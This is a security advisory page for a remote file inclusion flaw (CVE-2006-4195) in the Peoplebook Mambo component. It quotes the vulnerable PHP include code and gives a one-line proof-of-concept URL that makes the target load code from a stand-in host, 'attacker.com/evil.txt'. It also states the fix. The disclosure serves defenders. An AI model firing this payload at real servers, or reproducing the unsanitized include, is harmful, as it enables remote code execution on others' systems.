|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
If you have found a vulnerability, please send to our SecurityAlert Database : secalert()securityreason()com
Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com |
|
|
Home SecurityAlert Database |
|
|
Topic : | Peoplebook Mambo Component <= v1.0 Remote File Include Vulnerabilities
|
SecurityAlert : 1406
CVE : CVE-2006-4195
SecurityRisk : Medium (About)
Remote Exploit : Yes
Local Exploit : No
Exploit Available : Yes
Credit : matdhule gmail com
Published : 19.08.2006
Affected Software : | Peoplebook Mambo Component <= v1.0 |
 Advisory Content : ------------------------------------------------------------------------
---
Peoplebook Mambo Component <= v1.0 Remote File Include Vulnerabilities
------------------------------------------------------------------------
---
Author : Matdhule
Date : August, 14th 2006
Location : Indonesia, Jakarta
Critical Lvl : Highly critical
Impact : System access
Where : From Remote
------------------------------------------------------------------------
---
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Peoplebook Component
Application : Peoplebook Component
version : 1.0
URL : www.mamboforge.net/projects/peoplebook
------------------------------------------------------------------------
---
Vulnerability:
~~~~~~~~~~~~~~~
in folder com_peoplebook we found vulnerability script
param.peoplebook.php.
-----------------------param.peoplebook.php----------------------
....
<?php
if
(file_exists($mosConfig_absolute_path.'/components/com_peoplebook/langua
ges/'.$selected_lang.'.php')) {
require_once
($mosConfig_absolute_path.'/components/com_peoplebook/languages/'.$selec
ted_lang.'.php');
}
else {
require_once
($mosConfig_absolute_path.'/components/com_peoplebook/languages/english.
php');
}
...
----------------------------------------------------------
Variables $mosConfig_absolute_path are not properly sanitized. When
register_globals=on
and allow_fopenurl=on an attacker can exploit this vulnerability with a
simple php injection script.
Proof Of Concept:
~~~~~~~~~~~~~~~~
http://[target]/[path]/administrator/components/com_peoplebook/param.peo
plebook.php?mosConfig_absolute_path=http://attacker.com/evil.txt?
Solution:
~~~~~~~~
sanitize variabel $mosConfig_absolute_path in param.peoplebook.php
------------------------------------------------------------------------
---
Shoutz:
~~~~~~
~ solpot a.k.a chris, J4mbi H4ck3r for the hacking lesson :)
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous
~ bius, lapets, ghoz, t4mbun_hacker, NpR, h4ntu, thama
~ newbie_hacker (at) yahoogroups (dot) com [email concealed],
jasakom_perjuangan (at) yahoogroups (dot) com [email concealed]
~ #mardongan #jambihackerlink #e-c-h-o @irc.dal.net
------------------------------------------------------------------------
---
Contact:
~~~~~~~
matdhule[at]gmail[dot]com
-------------------------------- [ EOF ] ----------------------------------
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|
|
|
|